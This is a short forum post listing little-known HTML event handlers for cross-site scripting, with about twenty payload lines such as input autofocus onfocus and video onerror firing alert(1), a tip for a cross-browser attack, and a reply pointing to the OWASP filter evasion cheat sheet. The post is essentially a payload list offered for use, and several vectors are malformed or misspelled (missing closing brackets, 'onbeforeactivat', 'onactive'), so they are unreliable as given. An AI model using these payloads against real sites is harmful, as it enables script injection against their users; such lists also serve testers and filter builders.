Forum Thread: Little Known Event Handlers for XSS

Little Known Event Handlers for XSS

<xml onreadystatechange=alert(1)</script>
<style onreadystatechange=alert(1)</script>
<iframe onreadystatechange=alert(1)</script>
<object onerror=alert(1)>
<object type=image src=valid.gif onreadystatechange=alert(1)</object>
<isindex=image src=valid.gif onreadystatechange=alert(1)
<script onreadystatechange=alert(1)>
<bgsound onpropertychange=alert(1)>
<body onbeforeactivat=alert(1)>
<body onactive=alert(1)>
<body onfocus=alert(1)>

HTML5 presents many new vectors for event handlers:
<input autofocus onfocus=alert(1)>
<input onblur=alert(1) autofocus><input autofocus>
<input onscroll=alert(1)><br><br><br>...<br><input autofocus>
</a onmouseover=alert(1)>
<video src onerror=alert(1)>
<audio src=1 onerror=alert(1)>

*For an attack that works on all browsers, use an invalid image name with a onclick even handler "onclick="javascript:alert(1)*

Enjoy! You're welcome!

1 Response

Just to add to this, if anyone is interested OWASP has a very large cheat sheet XSS Filter Evasion

Share Your Thoughts

  • Hot
  • Active